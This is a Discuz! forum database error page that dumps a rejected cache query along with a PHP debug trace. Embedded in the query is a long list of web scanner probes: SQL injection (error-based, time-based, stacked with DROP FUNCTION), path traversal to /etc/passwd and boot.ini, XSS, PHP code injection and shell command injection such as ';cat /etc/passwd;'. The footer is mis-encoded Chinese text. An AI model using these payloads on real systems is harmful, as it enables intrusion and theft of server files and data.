Discuz! Database Error

(0) It is not safe to do this query
REPLACE INTO common_cache SET `cachekey`='threadclasscount_32' , `cachevalue`='a:1:{s:6:\"typeid\";a:181:{i:21;s:3:\"463\";i:22;s:2:\"91\";i:26;s:3:\"113\";i:25;s:2:\"79\";i:23;s:2:\"11\";i:24;s:3:\"443\";s:3:\"21 \";s:4:\"1958\";s:245:\"21\\\' AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND \\\'1\\\'=\\\'1\";s:4:\"1958\";s:237:\"21 AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1\";s:4:\"1958\";s:245:\"21%\\\' AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND \\\'%\\\'=\\\'\";s:4:\"1958\";s:234:\"21\\\') AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) #\";s:4:\"1958\";s:232:\"21) AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) #\";s:4:\"1958\";s:239:\"21 AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(1,(SELECT (SELECT CONCAT(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1\";s:4:\"1958\";s:247:\"21\\\' AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(1,(SELECT (SELECT CONCAT(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND \\\'1\\\'=\\\'1\";s:4:\"1958\";s:95:\"21 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) #\";s:4:\"1958\";s:97:\"21\\\' AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) #\";s:4:\"1958\";s:98:\"21%\\\' AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) #\";s:4:\"1958\";s:98:\"21\\\') AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) #\";s:4:\"1958\";s:96:\"21) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) #\";s:4:\"1958\";s:99:\"21\\\' AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) %23\";s:4:\"1958\";s:100:\"21%\\\' AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) %23\";s:4:\"1958\";s:100:\"21\\\') AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) %23\";s:4:\"1958\";s:98:\"21) AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) %23\";s:4:\"1958\";s:97:\"21 AND 1=(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1)) %23\";s:4:\"1958\";s:126:\"21 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) #\";s:4:\"1958\";s:128:\"21\\\' AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) #\";s:4:\"1958\";s:129:\"21%\\\' AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) #\";s:4:\"1958\";s:129:\"21\\\') AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) #\";s:4:\"1958\";s:127:\"21) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) #\";s:4:\"1958\";s:128:\"21 AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) %23\";s:4:\"1958\";s:130:\"21\\\' AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) %23\";s:4:\"1958\";s:131:\"21%\\\' AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) %23\";s:4:\"1958\";s:131:\"21\\\') AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) %23\";s:4:\"1958\";s:129:\"21) AND EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74)) %23\";s:4:\"1958\";s:183:\"21%\\\' AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND \\\'%\\\'=\\\'\";s:4:\"1958\";s:185:\"21\\\' AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND \\\'Ta\\\'=\\\'Ta\";s:4:\"1958\";s:187:\"21\\\') AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND (\\\'Ta\\\'=\\\'Ta\";s:4:\"1958\";s:183:\"21) AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) AND (2014=2014\";s:4:\"1958\";s:168:\"21 AND 1122=CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) \";s:4:\"1958\";s:38:\"21 AND 1=CHAR(106)+CHAR(106)+CHAR(106)\";s:4:\"1958\";s:43:\"21\\\' AND 1=CHAR(106)+CHAR(106)+CHAR(106) --\";s:4:\"1958\";s:44:\"21%\\\' AND 1=CHAR(106)+CHAR(106)+CHAR(106) --\";s:4:\"1958\";s:44:\"21\\\') AND 1=CHAR(106)+CHAR(106)+CHAR(106) --\";s:4:\"1958\";s:42:\"21) AND 1=CHAR(106)+CHAR(106)+CHAR(106) --\";s:4:\"1958\";s:216:\"21\\\' AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND \\\'NASDAQ\\\'=\\\'NASDAQ\";s:4:\"1958\";s:218:\"21\\\') AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND (\\\'NASDAQ\\\'=\\\'NASDAQ\";s:4:\"1958\";s:206:\"21%\\\' AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND \\\'%\\\'=\\\'\";s:4:\"1958\";s:206:\"21) AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL) AND (2014=2014\";s:4:\"1958\";s:190:\"21 AND 1122=(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL)\";s:4:\"1958\";s:223:\"(SELECT 1 FROM(SELECT COUNT(*),CONCAT((SELECT (SELECT CONCAT(0x5e5e5e,unhex(Hex(cast(database() as char))),0x5e5e5e)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1),floor(rand(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)\";s:2:\"15\";s:84:\"(UPDATEXML(1,CONCAT(0x5e24,(SELECT 0x5468696E6B3A693A646966666572656E74),0x5e24),1))\";s:2:\"15\";s:117:\"EXTRACTVALUE(1,CONCAT(0x5c,0x7468696E6B3A,(SELECT (CASE WHEN (1222=1222) THEN 1 ELSE 0 END)),0x3A646966666572656E74))\";s:2:\"15\";s:156:\"CONVERT(INT,(SELECT CHAR(84)+CHAR(97)+CHAR(105)+CHAR(87)+CHAR(97)+CHAR(110)+CHAR(58)+CHAR(103)+CHAR(111)+CHAR(58)+CHAR(104)+CHAR(111)+CHAR(109)+CHAR(101))) \";s:2:\"15\";s:178:\"(SELECT UPPER(XMLType(CHR(60)||CHR(104)||CHR(107)||CHR(58)||(SELECT (CASE WHEN (1122=1122) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(49)||CHR(57)||CHR(57)||CHR(55))) FROM DUAL)\";s:2:\"15\";s:232:\"(SELECT CHAR(116)+CHAR(104)+CHAR(105)+CHAR(110)+CHAR(107)+CHAR(58)+(SELECT (CASE WHEN (1943=1943) THEN CHAR(105) ELSE CHAR(48) END))+CHAR(58)+CHAR(100)+CHAR(105)+CHAR(102)+CHAR(102)+CHAR(101)+CHAR(114)+CHAR(101)+CHAR(110)+CHAR(116))\";s:2:\"15\";s:12:\"21 AND 27=36\";s:4:\"1958\";s:12:\"21 AND 16=16\";s:4:\"1958\";s:24:\"21) AND 91=54 AND (91=91\";s:4:\"1958\";s:24:\"21) AND 16=16 AND (16=16\";s:4:\"1958\";s:24:\"21 OR 13=13 LIMIT 100 --\";s:4:\"1958\";s:11:\"21 OR 36=19\";s:4:\"1958\";s:61:\"21,(SELECT (CASE WHEN (51=19) THEN 21 ELSE 1/(SELECT 0) END))\";s:4:\"1958\";s:61:\"21,(SELECT (CASE WHEN (61=61) THEN 21 ELSE 1/(SELECT 0) END))\";s:4:\"1958\";s:20:\"21,IIF(11=31,21,1/0)\";s:4:\"1958\";s:20:\"21,IIF(11=11,21,1/0)\";s:4:\"1958\";s:89:\"21,(SELECT (CASE WHEN (71=58) THEN 21 ELSE 71*(SELECT 71 FROM master..sysdatabases) END))\";s:4:\"1958\";s:89:\"21,(SELECT (CASE WHEN (92=92) THEN 21 ELSE 92*(SELECT 92 FROM master..sysdatabases) END))\";s:4:\"1958\";s:59:\"21 RLIKE (SELECT (CASE WHEN (75=13) THEN 21 ELSE 0x28 END))\";s:4:\"1958\";s:59:\"21 RLIKE (SELECT (CASE WHEN (39=39) THEN 21 ELSE 0x28 END))\";s:4:\"1958\";s:71:\"21) RLIKE (SELECT (CASE WHEN (31=91) THEN 21 ELSE 0x28 END)) AND (31=31\";s:4:\"1958\";s:71:\"21) RLIKE (SELECT (CASE WHEN (24=24) THEN 21 ELSE 0x28 END)) AND (17=17\";s:4:\"1958\";s:36:\"21) OR 51=51 OR (51=51) LIMIT 100 --\";s:4:\"1958\";s:22:\"21) OR 13=48 OR (13=48\";s:4:\"1958\";s:58:\"(SELECT (CASE WHEN (71=72) THEN 21 ELSE 1/(SELECT 0) END))\";s:2:\"15\";s:58:\"(SELECT (CASE WHEN (43=43) THEN 21 ELSE 1/(SELECT 0) END))\";s:2:\"15\";s:17:\"IIF(34=11,21,1/0)\";s:2:\"15\";s:17:\"IIF(41=41,21,1/0)\";s:2:\"15\";s:86:\"(SELECT (CASE WHEN (14=67) THEN 21 ELSE 14*(SELECT 14 FROM master..sysdatabases) END))\";s:2:\"15\";s:86:\"(SELECT (CASE WHEN (16=16) THEN 21 ELSE 16*(SELECT 16 FROM master..sysdatabases) END))\";s:2:\"15\";s:20:\"21\\\' AND \\\'4q\\\'=\\\'OS\";s:4:\"1958\";s:20:\"21\\\' AND \\\'4r\\\'=\\\'4r\";s:4:\"1958\";s:28:\"21%\\\' AND 48=83 AND \\\'%\\\'=\\\'\";s:4:\"1958\";s:28:\"21%\\\' AND 15=15 AND \\\'%\\\'=\\\'\";s:4:\"1958\";s:32:\"21\\\') AND 72=42 AND (\\\'3d\\\'=\\\'3d\";s:4:\"1958\";s:32:\"21\\\') AND 81=81 AND (\\\'aT\\\'=\\\'aT\";s:4:\"1958\";s:17:\"21%27 AND 74=94 #\";s:4:\"1958\";s:17:\"21%27 AND 74=74 #\";s:4:\"1958\";s:31:\"21%\\\') AND 31=15 AND 1 like(\\\'%\";s:4:\"1958\";s:31:\"21%\\\') AND 15=15 AND 1 like(\\\'%\";s:4:\"1958\";s:34:\"21\\\' OR \\\'s0\\\'=\\\'s0\\\' LIMIT 100 --\";s:4:\"1958\";s:19:\"21\\\' OR \\\'Vv\\\'=\\\'ZU\";s:4:\"1958\";s:58:\"21\\\'; IF(59=91) SELECT 1 ELSE DROP FUNCTION EEye_WebSec --\";s:4:\"1958\";s:58:\"21\\\'; IF(45=45) SELECT 1 ELSE DROP FUNCTION EEye_WebSec --\";s:4:\"1958\";s:57:\"21); IF(61=81) SELECT 1 ELSE DROP FUNCTION EEye_WebSec --\";s:4:\"1958\";s:57:\"21); IF(35=35) SELECT 1 ELSE DROP FUNCTION EEye_WebSec --\";s:4:\"1958\";s:83:\"21\\\') RLIKE (SELECT (CASE WHEN (33=34) THEN \\\'21\\\' ELSE 0x28 END)) AND (\\\'mu\\\'=\\\'mu\";s:4:\"1958\";s:83:\"21\\\') RLIKE (SELECT (CASE WHEN (81=81) THEN \\\'21\\\' ELSE 0x28 END)) AND (\\\'pH\\\'=\\\'pH\";s:4:\"1958\";s:79:\"21%\\\' RLIKE (SELECT (CASE WHEN (17=55) THEN \\\'21\\\' ELSE 0x28 END)) AND \\\'%\\\'=\\\'\";s:4:\"1958\";s:79:\"21%\\\' RLIKE (SELECT (CASE WHEN (11=11) THEN \\\'21\\\' ELSE 0x28 END)) AND \\\'%\\\'=\\\'\";s:4:\"1958\";s:81:\"21\\\' RLIKE (SELECT (CASE WHEN (68=92) THEN \\\'21\\\' ELSE 0x28 END)) AND \\\'Z7\\\'=\\\'Z7\";s:4:\"1958\";s:81:\"21\\\' RLIKE (SELECT (CASE WHEN (23=23) THEN \\\'21\\\' ELSE 0x28 END)) AND \\\'5e\\\'=\\\'5e\";s:4:\"1958\";s:99:\"(SELECT (CASE WHEN (72=52) THEN 21 ELSE 72*(SELECT 72 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))\";s:2:\"15\";s:30:\"21\\\' WAITFOR DELAY \\\'0:0:5\\\'--\";s:4:\"1958\";s:31:\"21\\\'; WAITFOR DELAY \\\'0:0:5\\\'--\";s:4:\"1958\";s:32:\"21%\\\'; WAITFOR DELAY \\\'0:0:5\\\'--\";s:4:\"1958\";s:29:\"21 WAITFOR DELAY \\\'0:0:5\\\' --\";s:4:\"1958\";s:30:\"21) WAITFOR DELAY \\\'0:0:5\\\' --\";s:4:\"1958\";s:32:\"21\\\') WAITFOR DELAY \\\'0:0:5\\\' --\";s:4:\"1958\";s:33:\"21\\\')) WAITFOR DELAY \\\'0:0:5\\\' --\";s:4:\"1958\";s:15:\"21 AND SLEEP(5)\";s:4:\"1958\";s:17:\"21 AND SLEEP(5) #\";s:4:\"1958\";s:19:\"21\\\' AND SLEEP(5) #\";s:4:\"1958\";s:18:\"21) AND SLEEP(5) #\";s:4:\"1958\";s:20:\"21\\\') AND SLEEP(5) #\";s:4:\"1958\";s:47:\"21,(SELECT if(COUNT(*)!=-1,SLEEP(5),SLEEP(5)))#\";s:4:\"1958\";s:49:\"21\\\',(SELECT if(COUNT(*)!=-1,SLEEP(5),SLEEP(5)))#\";s:4:\"1958\";s:48:\"21),(SELECT if(COUNT(*)!=-1,SLEEP(5),SLEEP(5)))#\";s:4:\"1958\";s:50:\"21\\\'),(SELECT if(COUNT(*)!=-1,SLEEP(5),SLEEP(5)))#\";s:4:\"1958\";s:97:\"21\\\' AND 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) AND \\\'TnT\\\'=\\\'TnT\";s:4:\"1958\";s:76:\"21AND 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5)\";s:4:\"1958\";s:93:\"21%\\\' AND 1997=DBMS_PIPE.RECEIVE_MESSAGE(CHR(115)||CHR(99)||CHR(97)||CHR(100),5) AND \\\'%\\\'=\\\'\";s:4:\"1958\";s:48:\"21+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-\";s:4:\"1958\";s:4:\"21\\\'\";s:4:\"1958\";s:5:\"21%27\";s:4:\"1958\";s:6:\"21\\0\\\'\";s:4:\"1958\";s:6:\"21\\\\\\\'\";s:4:\"1958\";s:6:\"21JyI=\";s:4:\"1958\";s:5:\"21¿\\'\";s:4:\"1958\";s:4:\"21[]\";s:4:\"1958\";s:13:\"21¨¤\\0xa7¨¤¡é\";s:4:\"1958\";s:3:\"21/\";s:4:\"1958\";s:3:\"21)\";s:4:\"1958\";s:6:\"21!(()\";s:4:\"1958\";s:14:\"21alert(42873)\";s:4:\"1958\";s:56:\"À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯boot.ini\";s:2:\"15\";s:51:\"/.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./boot.ini\";s:2:\"15\";s:12:\"C:\\\\boot.ini\";s:2:\"15\";s:40:\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini\";s:2:\"15\";s:40:\"..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯boot.ini\";s:2:\"15\";s:41:\"|..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\boot.ini\";s:2:\"15\";s:19:\"file:///c:/boot.ini\";s:2:\"15\";s:30:\"................windowswin.ini\";s:2:\"15\";s:52:\".\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./.\\\\\\\\./etc/passwd\";s:2:\"15\";s:11:\"/etc/passwd\";s:2:\"15\";s:25:\"/./././././././etc/passwd\";s:2:\"15\";s:42:\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\etc/passwd\";s:2:\"15\";s:42:\"..À¯..À¯..À¯..À¯..À¯..À¯..À¯..À¯etc/passwd\";s:2:\"15\";s:59:\"À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯À®À®À¯/etc/passwd\";s:2:\"15\";s:18:\"file:///etc/passwd\";s:2:\"15\";s:40:\"../../../../../../../../../../etc/passwd\";s:2:\"15\";s:42:\"../../../../../../../../../../etc/passwd\\0\";s:2:\"15\";s:58:\"..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd\";s:2:\"15\";s:42:\".../.../.../.../.../.../.../.../etc/passwd\";s:2:\"15\";s:43:\"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\/etc/passwd\";s:2:\"15\";s:26:\"................etc/passwd\";s:2:\"15\";s:43:\"..Áœ..Áœ..Áœ..Áœ..Áœ..Áœ..Áœ..Áœ/etc/passwd\";s:2:\"15\";s:34:\"../../../../../../../../etc/passwd\";s:2:\"15\";s:70:\"http://some-inexistent-website.com/some_inexistent_file_with_long_name\";s:2:\"15\";s:36:\"/some_inexistent_file_with_long_name\";s:2:\"15\";s:44:\"\r\n SomeCustomInjectedHeader:injected_by_test\";s:2:\"15\";s:43:\"\n SomeCustomInjectedHeader:injected_by_test\";s:2:\"15\";s:3:\"dir\";s:2:\"15\";s:25:\"http://oxoxoxoxoxoxox.com\";s:2:\"15\";s:18:\"oxoxoxoxoxoxox.com\";s:2:\"15\";s:46:\"+/v9 +ADw-script+AD4-alert(1)+ADw-/script+AD4-\";s:2:\"15\";s:19:\";print(md5(1122));#\";s:2:\"15\";s:23:\"\\\');print(md5(1122));//\";s:2:\"15\";s:20:\"${@print(md5(1122))}\";s:2:\"15\";s:7:\"phpinfo\";s:2:\"15\";s:23:\"\\\'];print(md5(1122));//\";s:2:\"15\";s:25:\"die(md5($_get[webscan]));\";s:2:\"15\";s:22:\";${@print(md5(1122))};\";s:2:\"15\";s:29:\"http://hitBAo6EKQnyr.bxss.me/\";s:2:\"15\";s:29:\"http://hitd0rQGQge8t.bxss.me/\";s:2:\"15\";s:36:\"http://testasp.vulnweb.com/t/fit.txt\";s:2:\"15\";s:7:\"set|set\";s:2:\"15\";s:17:\";cat /etc/passwd;\";s:2:\"15\";s:21:\"`ping -c 5 127.0.0.1`\";s:2:\"15\";s:21:\"|ping -n 5 127.0.0.1|\";s:2:\"15\";s:20:\"|ping -c 4 127.0.0.1\";s:2:\"15\";s:31:\"response.write(9412458*9542755)\";s:2:\"15\";}}'

PHP Debug

No.FileLineCode
1forum.php67require(%s)
2source/module/forum/forum_forumdisplay.php544threadclasscount(%s, %d, %s, %s)
3source/function/function_forumlist.php410discuz_table->insert(Array, false, true)
4source/class/discuz/discuz_table.php81discuz_database::insert(%s, Array, false, true, %s)
5source/class/discuz/discuz_database.php60discuz_database::query(%s, %s, %s, true)
6source/class/discuz/discuz_database.php140discuz_database::checkquery(%s)
7source/class/discuz/discuz_database.php177discuz_database_safecheck::checkquery(%s)
8source/class/discuz/discuz_database.php368break()
www.qishulou.net ÒѾ­½«´Ë³ö´íÐÅÏ¢Ïêϸ¼Ç¼, Óɴ˸øÄú´øÀ´µÄ·ÃÎʲ»±ãÎÒÃÇÉî¸ÐǸÒâ.